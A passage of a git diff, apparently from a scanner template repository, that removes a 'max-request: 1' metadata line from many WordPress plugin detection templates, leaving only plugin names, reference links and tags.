     wpscan: https://wpscan.com/plugin/header-footer
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml
index 5a570b9077..af8193b875 100644
--- a/http/technologies/wordpress/plugins/health-check.yaml
+++ b/http/technologies/wordpress/plugins/health-check.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/health-check/
   metadata:
-    max-request: 1
     plugin_namespace: health-check
     wpscan: https://wpscan.com/plugin/health-check
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml
index 4ecac0cd92..8d7e45818b 100644
--- a/http/technologies/wordpress/plugins/hello-dolly.yaml
+++ b/http/technologies/wordpress/plugins/hello-dolly.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/hello-dolly/
   metadata:
-    max-request: 1
     plugin_namespace: hello-dolly
     wpscan: https://wpscan.com/plugin/hello-dolly
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
index e50f58cef8..ed3967db7b 100644
--- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml
+++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/host-webfonts-local/
   metadata:
-    max-request: 1
     plugin_namespace: host-webfonts-local
     wpscan: https://wpscan.com/plugin/host-webfonts-local
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml
index 031bb48563..2ff5adba86 100644
--- a/http/technologies/wordpress/plugins/imagify.yaml
+++ b/http/technologies/wordpress/plugins/imagify.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/imagify/
   metadata:
-    max-request: 1
     plugin_namespace: imagify
     wpscan: https://wpscan.com/plugin/imagify
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml
index 3cdcf3da93..9099f3c0a5 100644
--- a/http/technologies/wordpress/plugins/imsanity.yaml
+++ b/http/technologies/wordpress/plugins/imsanity.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/imsanity/
   metadata:
-    max-request: 1
     plugin_namespace: imsanity
     wpscan: https://wpscan.com/plugin/imsanity
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
index c222bc9d4a..1ee0e67542 100644
--- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
+++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/insert-headers-and-footers/
   metadata:
-    max-request: 1
     plugin_namespace: insert-headers-and-footers
     wpscan: https://wpscan.com/plugin/insert-headers-and-footers
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml
index 9c6e3e6d2e..1778552d75 100644
--- a/http/technologies/wordpress/plugins/instagram-feed.yaml
+++ b/http/technologies/wordpress/plugins/instagram-feed.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/instagram-feed/
   metadata:
-    max-request: 1
     plugin_namespace: instagram-feed
     wpscan: https://wpscan.com/plugin/instagram-feed
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
index 66b7d6a363..7ba81036cf 100644
--- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/intuitive-custom-post-order/
   metadata:
-    max-request: 1
     plugin_namespace: intuitive-custom-post-order
     wpscan: https://wpscan.com/plugin/intuitive-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml
index a36016562d..24fc3e3295 100644
--- a/http/technologies/wordpress/plugins/iwp-client.yaml
+++ b/http/technologies/wordpress/plugins/iwp-client.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/iwp-client/
   metadata:
-    max-request: 1
     plugin_namespace: iwp-client
     wpscan: https://wpscan.com/plugin/iwp-client
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml
index 8033aacbc6..3e89505574 100644
--- a/http/technologies/wordpress/plugins/jetpack-boost.yaml
+++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack-boost/
   metadata:
-    max-request: 1
     plugin_namespace: jetpack-boost
     wpscan: https://wpscan.com/plugin/jetpack-boost
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml
index e4017b1a0a..e701e365ba 100644
--- a/http/technologies/wordpress/plugins/jetpack.yaml
+++ b/http/technologies/wordpress/plugins/jetpack.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack/
   metadata:
-    max-request: 1
     plugin_namespace: jetpack
     wpscan: https://wpscan.com/plugin/jetpack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml
index 53d6d393bd..c0cc5400a8 100644
--- a/http/technologies/wordpress/plugins/kadence-blocks.yaml
+++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/kadence-blocks/
   metadata:
-    max-request: 1
     plugin_namespace: kadence-blocks
     wpscan: https://wpscan.com/plugin/kadence-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml
index c286e9a14f..22687bcffe 100644
--- a/http/technologies/wordpress/plugins/kirki.yaml
+++ b/http/technologies/wordpress/plugins/kirki.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/kirki/
   metadata:
-    max-request: 1
     plugin_namespace: kirki
     wpscan: https://wpscan.com/plugin/kirki
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml
index 364e3cd71e..b69d3d5bfe 100644
--- a/http/technologies/wordpress/plugins/leadin.yaml
+++ b/http/technologies/wordpress/plugins/leadin.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/leadin/
   metadata:
-    max-request: 1
     plugin_namespace: leadin
     wpscan: https://wpscan.com/plugin/leadin
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
index 4fcccbfc33..7975a57702 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts-reloaded/
   metadata:
-    max-request: 1
     plugin_namespace: limit-login-attempts-reloaded
     wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
index 3fbc714d3b..ff4cef94d7 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts/
   metadata:
-    max-request: 1
     plugin_namespace: limit-login-attempts
     wpscan: https://wpscan.com/plugin/limit-login-attempts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml
index c49b506979..a8903697b0 100644
--- a/http/technologies/wordpress/plugins/litespeed-cache.yaml
+++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/litespeed-cache/
   metadata:
-    max-request: 1
     plugin_namespace: litespeed-cache
     wpscan: https://wpscan.com/plugin/litespeed-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml
index dfcaf6f71b..3f141c4476 100644
--- a/http/technologies/wordpress/plugins/loco-translate.yaml
+++ b/http/technologies/wordpress/plugins/loco-translate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/loco-translate/
   metadata:
-    max-request: 1
     plugin_namespace: loco-translate
     wpscan: https://wpscan.com/plugin/loco-translate
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml
index 61be246fee..5355e988a2 100644
--- a/http/technologies/wordpress/plugins/loginizer.yaml
+++ b/http/technologies/wordpress/plugins/loginizer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/loginizer/
   metadata:
-    max-request: 1
     plugin_namespace: loginizer
     wpscan: https://wpscan.com/plugin/loginizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
index 50d2e6630b..53d409fb68 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: mailchimp-for-woocommerce
     wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
index 8d71f7bde9..0e908a9580 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-wp/
   metadata:
-    max-request: 1
     plugin_namespace: mailchimp-for-wp
     wpscan: https://wpscan.com/plugin/mailchimp-for-wp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml
index 5e1f97086e..aeb1875c57 100644
--- a/http/technologies/wordpress/plugins/mailpoet.yaml
+++ b/http/technologies/wordpress/plugins/mailpoet.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailpoet/
   metadata:
-    max-request: 1
     plugin_namespace: mailpoet
     wpscan: https://wpscan.com/plugin/mailpoet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml
index d87d456a8c..7c15702305 100644
--- a/http/technologies/wordpress/plugins/maintenance.yaml
+++ b/http/technologies/wordpress/plugins/maintenance.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/maintenance/
   metadata:
-    max-request: 1
     plugin_namespace: maintenance
     wpscan: https://wpscan.com/plugin/maintenance
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml
index aa9153241e..5ce87e6c71 100644
--- a/http/technologies/wordpress/plugins/mainwp-child.yaml
+++ b/http/technologies/wordpress/plugins/mainwp-child.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mainwp-child/
   metadata:
-    max-request: 1
     plugin_namespace: mainwp-child
     wpscan: https://wpscan.com/plugin/mainwp-child
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml
index 09641796a3..c342e6b45a 100644
--- a/http/technologies/wordpress/plugins/malcare-security.yaml
+++ b/http/technologies/wordpress/plugins/malcare-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/malcare-security/
   metadata:
-    max-request: 1
     plugin_namespace: malcare-security
     wpscan: https://wpscan.com/plugin/malcare-security
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml
index 28b70d09bf..e95041f555 100644
--- a/http/technologies/wordpress/plugins/megamenu.yaml
+++ b/http/technologies/wordpress/plugins/megamenu.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/megamenu/
   metadata:
-    max-request: 1
     plugin_namespace: megamenu
     wpscan: https://wpscan.com/plugin/megamenu
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml
index b43c10ed7a..879a0d1c12 100644
--- a/http/technologies/wordpress/plugins/members.yaml
+++ b/http/technologies/wordpress/plugins/members.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/members/
   metadata:
-    max-request: 1
     plugin_namespace: members
     wpscan: https://wpscan.com/plugin/members
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml
index eb7e78bc7f..985f5d373a 100644
--- a/http/technologies/wordpress/plugins/meta-box.yaml
+++ b/http/technologies/wordpress/plugins/meta-box.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/meta-box/
   metadata:
-    max-request: 1
     plugin_namespace: meta-box
     wpscan: https://wpscan.com/plugin/meta-box
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml
index 3da2ea50e1..bbc305b8de 100644
--- a/http/technologies/wordpress/plugins/ml-slider.yaml
+++ b/http/technologies/wordpress/plugins/ml-slider.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ml-slider/
   metadata:
-    max-request: 1
     plugin_namespace: ml-slider
     wpscan: https://wpscan.com/plugin/ml-slider
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml
index 7a58c58f63..7e3e4e2d7e 100644
--- a/http/technologies/wordpress/plugins/newsletter.yaml
+++ b/http/technologies/wordpress/plugins/newsletter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/newsletter/
   metadata:
-    max-request: 1
     plugin_namespace: newsletter
     wpscan: https://wpscan.com/plugin/newsletter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
index 5f99b8cac8..17ea142c46 100644
--- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
+++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/nextend-facebook-connect/
   metadata:
-    max-request: 1
     plugin_namespace: nextend-facebook-connect
     wpscan: https://wpscan.com/plugin/nextend-facebook-connect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
index b08876df04..953e4ab3d8 100644
--- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml
+++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/nextgen-gallery/
   metadata:
-    max-request: 1
     plugin_namespace: nextgen-gallery
     wpscan: https://wpscan.com/plugin/nextgen-gallery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml
index 3f68dffe06..92107fa69c 100644
--- a/http/technologies/wordpress/plugins/ninja-forms.yaml
+++ b/http/technologies/wordpress/plugins/ninja-forms.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ninja-forms/
   metadata:
-    max-request: 1
     plugin_namespace: ninja-forms
     wpscan: https://wpscan.com/plugin/ninja-forms
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml
index 34f9bde1d6..5e1fe4ef5c 100644
--- a/http/technologies/wordpress/plugins/ocean-extra.yaml
+++ b/http/technologies/wordpress/plugins/ocean-extra.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ocean-extra/
   metadata:
-    max-request: 1
     plugin_namespace: ocean-extra
     wpscan: https://wpscan.com/plugin/ocean-extra
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
index d9f645328f..74fb3e6010 100644
--- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
+++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/official-facebook-pixel/
   metadata:
-    max-request: 1
     plugin_namespace: official-facebook-pixel
     wpscan: https://wpscan.com/plugin/official-facebook-pixel
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
index 8a1196fc9f..b9f70ba555 100644
--- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml
+++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/one-click-demo-import/
   metadata:
-    max-request: 1
     plugin_namespace: one-click-demo-import
     wpscan: https://wpscan.com/plugin/one-click-demo-import
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml
index 05025452b7..6486c02c9a 100644
--- a/http/technologies/wordpress/plugins/optinmonster.yaml
+++ b/http/technologies/wordpress/plugins/optinmonster.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/optinmonster/
   metadata:
-    max-request: 1
     plugin_namespace: optinmonster
     wpscan: https://wpscan.com/plugin/optinmonster
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml
index 1db1b57708..81f58198d3 100644
--- a/http/technologies/wordpress/plugins/otter-blocks.yaml
+++ b/http/technologies/wordpress/plugins/otter-blocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/otter-blocks/
   metadata:
-    max-request: 1
     plugin_namespace: otter-blocks
     wpscan: https://wpscan.com/plugin/otter-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml
index dafe6974f6..3743307dbc 100644
--- a/http/technologies/wordpress/plugins/password-protected.yaml
+++ b/http/technologies/wordpress/plugins/password-protected.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/password-protected/
   metadata:
-    max-request: 1
     plugin_namespace: password-protected
     wpscan: https://wpscan.com/plugin/password-protected
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml
index ba05fb1e16..a4c6980041 100644
--- a/http/technologies/wordpress/plugins/pdf-embedder.yaml
+++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pdf-embedder/
   metadata:
-    max-request: 1
     plugin_namespace: pdf-embedder
     wpscan: https://wpscan.com/plugin/pdf-embedder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
index a038adac53..e085f30e5a 100644
--- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pinterest-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: pinterest-for-woocommerce
     wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml
index 7f98d822a8..adf3387ddb 100644
--- a/http/technologies/wordpress/plugins/pixelyoursite.yaml
+++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pixelyoursite/
   metadata:
-    max-request: 1
     plugin_namespace: pixelyoursite
     wpscan: https://wpscan.com/plugin/pixelyoursite
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml
index 89602f4264..eb6e1aaa5d 100644
--- a/http/technologies/wordpress/plugins/polylang.yaml
+++ b/http/technologies/wordpress/plugins/polylang.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/polylang/
   metadata:
-    max-request: 1
     plugin_namespace: polylang
     wpscan: https://wpscan.com/plugin/polylang
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml
index 2f6513ca42..b3c83cd0bf 100644
--- a/http/technologies/wordpress/plugins/popup-builder.yaml
+++ b/http/technologies/wordpress/plugins/popup-builder.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-builder/
   metadata:
-    max-request: 1
     plugin_namespace: popup-builder
     wpscan: https://wpscan.com/plugin/popup-builder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml
index 982306b13c..96d8bd6aca 100644
--- a/http/technologies/wordpress/plugins/popup-maker.yaml
+++ b/http/technologies/wordpress/plugins/popup-maker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-maker/
   metadata:
-    max-request: 1
     plugin_namespace: popup-maker
     wpscan: https://wpscan.com/plugin/popup-maker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml
index fdcac13b56..85955ac95e 100644
--- a/http/technologies/wordpress/plugins/post-smtp.yaml
+++ b/http/technologies/wordpress/plugins/post-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/post-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: post-smtp
     wpscan: https://wpscan.com/plugin/post-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml
index fc316f9f7a..a81fc892ca 100644
--- a/http/technologies/wordpress/plugins/post-types-order.yaml
+++ b/http/technologies/wordpress/plugins/post-types-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/post-types-order/
   metadata:
-    max-request: 1
     plugin_namespace: post-types-order
     wpscan: https://wpscan.com/plugin/post-types-order
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
index 975b63f5de..d9c6052cd7 100644
--- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
+++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/premium-addons-for-elementor/
   metadata:
-    max-request: 1
     plugin_namespace: premium-addons-for-elementor
     wpscan: https://wpscan.com/plugin/premium-addons-for-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml
index 5065659e82..afc1141e0c 100644
--- a/http/technologies/wordpress/plugins/pretty-link.yaml
+++ b/http/technologies/wordpress/plugins/pretty-link.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pretty-link/
   metadata:
-    max-request: 1
     plugin_namespace: pretty-link
     wpscan: https://wpscan.com/plugin/pretty-link
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
index 732ffbc4eb..d44add9ca6 100644
--- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-captcha/
   metadata:
-    max-request: 1
     plugin_namespace: really-simple-captcha
     wpscan: https://wpscan.com/plugin/really-simple-captcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
index 12dffeb534..20ba5c2e16 100644
--- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-ssl/
   metadata:
-    max-request: 1
     plugin_namespace: really-simple-ssl
     wpscan: https://wpscan.com/plugin/really-simple-ssl
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml
index ae0e76c4bb..cbcf3cf09d 100644
--- a/http/technologies/wordpress/plugins/redirection.yaml
+++ b/http/technologies/wordpress/plugins/redirection.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/redirection/
   metadata:
-    max-request: 1
     plugin_namespace: redirection
     wpscan: https://wpscan.com/plugin/redirection
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml
index b1718d1ccb..3311d42c94 100644
--- a/http/technologies/wordpress/plugins/redux-framework.yaml
+++ b/http/technologies/wordpress/plugins/redux-framework.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/redux-framework/
   metadata:
-    max-request: 1
     plugin_namespace: redux-framework
     wpscan: https://wpscan.com/plugin/redux-framework
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
index 7543ac1d55..46c1c22805 100644
--- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/regenerate-thumbnails/
   metadata:
-    max-request: 1
     plugin_namespace: regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml
index 4a29cecdb0..7c13b8d2a4 100644
--- a/http/technologies/wordpress/plugins/safe-svg.yaml
+++ b/http/technologies/wordpress/plugins/safe-svg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/safe-svg/
   metadata:
-    max-request: 1
     plugin_namespace: safe-svg
     wpscan: https://wpscan.com/plugin/safe-svg
   tags: tech,wordpress,wp-plugin,top-100,top-200
